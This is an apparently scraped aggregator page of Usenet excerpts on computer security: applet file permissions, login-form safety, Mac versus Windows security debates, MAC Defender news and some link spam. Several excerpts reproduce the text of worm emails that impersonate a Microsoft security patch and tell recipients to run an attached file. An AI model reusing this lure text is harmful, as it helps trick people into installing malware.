I need to permit to an Applet to read and write HD files. All ok with java 1.2, 1.3, 1.4 and 1.5 of Sun. But when, before signing a verson of my applet written for Internet Explorer without Java SUN (Microsoft 1.1.4 JVM), I try to insert this: try { Class s=Class.forName("com.ms.security.PolicyEngine"); if (s!=null) {s.assertPermission(com.ms.security.PermissionID.FILEIO);} } catch(Throwable e) {System.out.println("Error: "+e);} The result, is, while I compile my applet, the following error: package com.ms.security does not exist s.assertPermission(com...

Prove security pack from the MS Corporation
--rtqpsagdh Content-Type: multipart/related; boundary="qlmpyvxtzaiqpfvd"; type="multipart/alternative" --qlmpyvxtzaiqpfvd Content-Type: multipart/alternative; boundary="gmytwchqeyq" --gmytwchqeyq Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft User this is the latest version of security update, the "October 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to help protect your computer from these vulnerabilities, ...

Check this critical pack from MS Corporation
--fqrneenomicsigtmj Content-Type: multipart/related; boundary="atcwckecpwzzyv"; type="multipart/alternative" --atcwckecpwzzyv Content-Type: multipart/alternative; boundary="fligenrjbdvhnmfwc" --fligenrjbdvhnmfwc Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Client this is the latest version of security update, the "December 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to help maintain the s...

Look at the security pack that came from the Microsoft Corp.
--hzprngjtghnfew Content-Type: multipart/related; boundary="golkbhapl"; type="multipart/alternative" --golkbhapl Content-Type: multipart/alternative; boundary="tescsyqwbgigjplj" --tescsyqwbgigjplj Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Customer this is the latest version of security update, the "September 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an malicious user to run code on your system. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using...

RE: Install that security pack for MS Windows
--qotjxfaftrmpivkl Content-Type: multipart/related; boundary="bapzcpkrjzmvx"; type="multipart/alternative" --bapzcpkrjzmvx Content-Type: multipart/alternative; boundary="igwnljuwssswjeq" --igwnljuwssswjeq Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Customer this is the latest version of security update, the "June 2004, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to help protect your computer. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Plea...

[mS ***Hot stuff
http://www.kaneva.com/checkout/stream.aspx?assetId=2017&free=0 ...

MS Security Holes Could Halt MS Web Services
Bleak picture for MS web services if users block Win from accessing the internet. "I see a time, pretty soon now, when many business will have Linux computers for Internet access and no Internet access at all on their Windows computers." "Recent surveys have shown an infection rate of well over 80% for business computers with Internet access. I'd say the infection rate for Internet connected home computers is about 100%." "What can be done to alleviate this problem? Microsoft says "Nothing". Mike Danseglio, a manager in Microsoft's securit...

How secure is the security from my security form?
Hey, I have a question about how secure the following will be.... I want to have a login form that posts to itself, so when it loads it checks if there is a username and password on the query list. If there is not, it asks for one. If there is, it checks to see if the information is valid. If it is not valid, it deletes the attributes and calls itself again. If it is valid it sets a particular session variable to be some value and redirects to the next page. Every page from there on in will check to see if the session variable is set and if not will redirect back to the login page. Are ...

how secure is the security from my security form?
Hey, I have a question about how secure the following will be.... I want to have a login form that posts to itself, so when it loads it checks if there is a username and password on the query list. If there is not, it asks for one. If there is, it checks to see if the information is valid. If it is not valid, it deletes the attributes and calls itself again. If it is valid it sets a particular session variable to be some value and redirects to the next page. Every page from there on in will check to see if the session variable is set and if not will redirect back to the login page. Are there any security risks/holes that I should know about? Thanks in advance, Aaron PS I do have access to Tomcat, but have been unable to figure out how to set it up (this is my first time setting up security for a site) - so if anyone has any tips/links that information would be most appreciated. Thanks again. ...

Mac to mac
I just remembered these groups and wondered if someone here could tell me whether what I'd like to do is possible. (NO ONE around here knows anything about Macs) I have a G4 that was the top of the line in 1998. It will die one of these days. It's currently running OS 9.2.2. Someone else(who now lives far away) installed the internal modem, SCSI for my scanner, and my floppy drive (so I didn't have to go through hundreds of them for the bits and pieces I might someday want again). I still have the floppies and a number of Zips, all of which this computer can read. Install...

Mac security
http://www.macintoshsecurity.com/ I know this really has nothing to do with Macs, but it is amusing. ;-) Stew wrote: > http://www.macintoshsecurity.com/ > > I know this really has nothing to do with Macs, but it is amusing. ;-) > Heh! Sound like Kadaithcha. -- Where are we going? And why am I in this handbasket? In article <frednf1l6qwj6tPZnZ2dneKdnZydnZ2d@bresnan.com>, GreyCloud <mist@cumulus.com> wrote: > Stew wrote: > > > http://www.macintoshsecurity.com/ > > > > I know this really has nothing to do with Macs, but it is amusing. ;-) > > > > Heh! Sound like Kadaithcha. You mean the sad little ZERO. -- Yours, Tom Stew wrote (in article <2006042510414516807-antwun@yahoocom>): > http://www.macintoshsecurity.com/ > > I know this really has nothing to do with Macs, but it is amusing. ;-) > LOL That's what you get for running PHP-Nuke. :-) -- Lefty All of God's creatures have a place.......... ..........right next to the potatoes and gravy. See also: http://www.gizmodo.com/gadgets/images/iProduct.gif On 2006-04-25 13:18:15 -0700, Tom Bates <tb@offthehk.lk> said: > In article <frednf1l6qwj6tPZnZ2dneKdnZydnZ2d@bresnan.com>, > GreyCloud <mist@cumulus.com> wrote: > >> Stew wrote: >> >>> http://www.macintoshsecurity.com/ >>> >>> I know this really has nothing to do with Macs, but it is amusing. ;-) &...

sys .mac
Dear Friend, I have found some websites: for msn messenger, http://www.hotmailpk.com/ For entertainment,spotlight.articles,interviews,dailyupdate htttp://www.familyandtwist.com/ for sms messeges, smsjokes, http://www.smstwist.com/ for articles,entertainment,beauty tips,news,showbiz and fashion http://http://www.familypk.com Visit these websites: Thanks ...

Security Checking
SQL Server allows for a user to have SELECT permission on a View without that user requiring an associated SELECT permission on the underlying table that the VIEW accesses, but the user can still access the data through the View. A similar arrangement holds true for stored procedures. So based on these initial known behaviours, I have a couple of questions: 1. If a stored procedure A executes stored procedure B, does the user of A require execute permission for B also? Or will access to B be permitted regardless because the user was given access to A? 2. Similarly, if a stored procedure A accesses a View, does the user of A require permissions on the referenced View? I guess to paraphrase what I am trying to determine is whether SQL Server only checks permissions at the "entry" point of a particular function, or whether permission checks are performed "intra-function". My opening examples imply they are only checked "on entry", but I am wondering if this behaviour is entirely consistent. Perhaps the SQL Standard mandates this? Kevin Frey (kevin_g_frey@hotmail.com) writes: > SQL Server allows for a user to have SELECT permission on a View without > that user requiring an associated SELECT permission on the underlying > table that the VIEW accesses, but the user can still access the data > through the View. A similar arrangement holds true for stored > procedures. > > So based on these initial known behaviou...

Vista more secure than OS X says MS Security Business unit ..
"Vista beat the other operating systems on nearly all fronts, according to the report, logging the fewest fixed vulnerabilities and the fewest repairs with a severity rating of 'high'" "Apple's OS X ranked third behind the two Windows versions, followed by Ubuntu, SLED10 and RHEL4" http://www.vnunet.com/vnunet/news/2192615/microsoft-claims-vista-secure http://www.csoonline.com/pdf/6_Month_Vista_Vuln_Report.pdf In article <f5gqpk$7j5$2@news.datemas.de>, Doug Mentohl <doug_mentohl@linuxmail.org> wrote: > "Vista beat the other operating ...

Differnce between setting mac address port security under the interface vs. the mac address-table global command
I'm familiar with setting a static MAC address under a Cisco switch's individual interfaces. But there's another command (actually, a family of commands) at the global level. The one I'm interested in is: mac address-table static xxxx.xxxxx.xxxx vlan y interface FastEthernet0/z I'm not familiar with this command and what it does. How does it differ from setting the MAC address under the specific interface? Do they both do the same thing? Would you use them at the same time? Thanks in advance. On 1 Feb, 19:16, ttripp <ttr...@manh.com> wrote: >...

MAC Defender variant quickly thwarts Apple's Mac OS X security update
http://bit.ly/msgDE0 MAC Defender variant quickly thwarts Apple's Mac OS X security update By AppleInsider Staff Published: 03:55 PM EST A day after Apple released a security update for Mac OS X to address the "MAC Defender" malware, a new variant of the bogus antivirus software has been spotted in the wild. As first reported by Ed Bott at ZDNet, the new variation of MAC Defender, named "Mdinstall.pkg," has been crafted to bypass the new malware-blocking code made available by Apple. That update for Mac OS X, Security Update 2011-003, was released on Tuesday. "The file has a date and time stamp from last night at 9:24PM Pacific time," Bott wrote. That's less than 8 hours after Apple's security update was released. On a test system using Safari with default settings, it behaved exactly as before, beginning the installation process with no password required. "As PC virus experts know, this cat-and-mouse game can go on indefinitely. Your move, Apple." Security Update 2011-003 included changes to the File Quarantine feature found in Mac OS X 10.6 Snow Leopard. It includes anti-malware definitions within the operating system itself, and examines external files downloaded within Mail, iChat, Safari, or other quarantine-aware applications. The MACDefender malware first gained attention in early May, when it was spotted by an antivirus company. The program automatically download...

check one two check check
check check one twoo Stifler wrote: > check check one twoo You're supposed to say that into a microphone. Here it goes like this: "this is a test, please ignore." -- _______________________________________________________________________ Christopher R. Carlen Principal Laser/Optical Technologist Sandia National Laboratories CA USA crcarle@sandia.gov -- NOTE: Remove "BOGUS" from email address to reply. ...

Here we go again...More Problems with John lying about "Windows security" (was Re: There They Go Again
(zurg suggested i repost this post as a seperate, new thread, so John cant hide from the truth buried in the original thread...enjoy!) On Mon, 22 Dec 2003 20:37:08 -0800, "John" <nospam@nospam.com> wrote: >Name 1 dozen Windows problems that HAVE been exploited and provide >references you lying Jackshit. You gotta be kidding me...I'll bet you're one of those types that doesn't believe we really landed on the moon, or that Islamic terrorists weren't really responsible for 9/11... Alright, just to be fair, I'll humor your ignorant ass by posting what you requested: 1. Port 139 Out-of-Band error (aka "ping of death"): (do you really need a reference on this one? This is so well documented, you'd be a moron not to know about it. Probably every Windows box on the internet BSOD'ed at least once, once this exploit was made public) 2. Code Red Worm: Exploited buffer overflow condition in IIS. Over 359,000 Windows machines exploited worldwide. http://www.cert.org/advisories/CA-2001-19.html http://www.eeye.com/html/Research/Advisories/AD20010618.html http://news.com.com/2100-1001-271103.html 3. Nimda Worm: Propagated by exploiting classic IIS directory traversal vulnerability, automatic execution of embedded MIME types, as well as insecure Windows SMB shares. Over 26,000 *reported* exploits, undoubtedly tens of thousands more affected. Internet backbones throughout the world experience saturated bandwidth due to Nim...

MOSX & BSD World's Safest And Most Secure (was Re: Mac OS X Security
First I said in article 'Re: Mac OS X Security - Not Quite as Strong as you Thought': > > > But you can't escape > > the fact that OpenBSD, FreeBSD (both ancestors of NeXTStep/OpenStep/Mac > > OS X) and Mac OS X itself have the undisputed, unrivaled best security > > reputations in the business. Then the affable "Dan Johnson" <danieljohnson@vzavenue.net> wrote: > > I do not see that OS X has 'the undisputed, unrivaled best security > reputation'; as far as I can tell, only the Mac faithful think so > highly of it. No. You need to do more research and stop believing myths. As ever, I don't post 'religious warz' articles. I post facts. Here is a key references: <http://www.pcpro.co.uk/news/65331/os-x-is-worlds-most-secure-operating-s ystem-report-concludes.html> > OS X is world's most secure operating system, report concludes 12:50PM > Mac OS X and BSD Unix have been named as the world's safest and most secure > online computing environments after a year-long study by enterprise security > specialists mi2g. > > In what is describes as 'the most comprehensive study ever undertaken', > mi2g's Intelligence Unit analysed over 235,000 security breaches against > permanently online systems and found that Mac OS X or BSD (on which OS X is > partly based) accounted for just 4.82 per cent of all successful attacks. > Linux was the...

which is more secure Mac or Linux ..
'I�ll say I�m marginally more secure on Linux than on a Mac, but I prefer a Mac anyway. I can almost see my inbox filling with flames from you penguin lovers everywhere, but let me explain my opinion' 'I find Linux�s security controls to be more true to the UNIX model they were patterned after. OS X, on the other hand, started with the UNIX model, but then diverged rather substantially' http://www.esecurityplanet.com/article.php/3662516 On 4/3/07 4:52 pm, Doug Mentohl wrote: > 'I�ll say I�m marginally more secure on Linux than on a Mac, but I > prefer a Mac an...

internet security pack
--aodeyeuvsmgiwne Content-Type: multipart/related; boundary="nzvzaaosofiikp"; type="multipart/alternative" --nzvzaaosofiikp Content-Type: multipart/alternative; boundary="efqzcawszxy" --efqzcawszxy Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft User this is the latest version of security update, the "September 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to help maintain the security of your computer from these vulnerabilities. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank y...

Web resources about - Check these security pack that came from the MS - comp.sys.mac

Krebs on Security
The House Financial Services Committee is slated to hold a hearing this Friday on the impact of cyber heists against small- to mid-sized businesses. ...

Security Middle East - Latest news from the Middle East.
Security Middle East is a news portal for the entire security industry, focussed specifically on latest security news from the Middle East. Security ...

Information Security News, IT Security News & Expert Insights: SecurityWeek.Com
IT Security News and Information Security News, Cyber Security, Network Security, Enterprise Security Threats, Cybercrime News and more. Information ...

Security (finance) - Wikipedia, the free encyclopedia
equity securities, e.g., common stocks ; and, The company or other entity issuing the security is called the issuer . A country's regulatory ...

Brussels 'march against fear' called off after security concerns
Organisers have cancelled a march in Brussels that was meant to show defiance to last week's bomb attacks, after senior officials urged people ...

Samsung Galaxy S7 Edge receiving April security update in Korea
Samsung has begun to roll-out the latest Android Security Patch for the Galaxy S7 Edge in South Korea. The update, which clocks in at just over ...

Belgium Cancels ‘March Against Fear’ Amid Security Concerns
... thought to be the fugitive third Brussels airport bomber with terrorist murder, as a peace march for the victims was cancelled for security ...

Security researchers discovered a flaw in Apple's messaging system that could let hackers intercept photos ...
... Post reports . The flaw worked on Apple customers using outdated versions of Apple's operating system. Every iOS release increases security, ...

MoneyWatch: Wall Street awaits jobs report; Airlines warn of longer security lines - Videos - CBS News ...
Investors will be watching for the important March jobs report after the long holiday weekend. Also, get ready for extra long security lines ...

Brussels peace march canceled due to security concerns
CNN Brussels peace march canceled due to security concerns CNN Story highlights. Authorities asked that the rally be postponed, organizer ...

Resources last updated: 3/28/2016 11:37:57 AM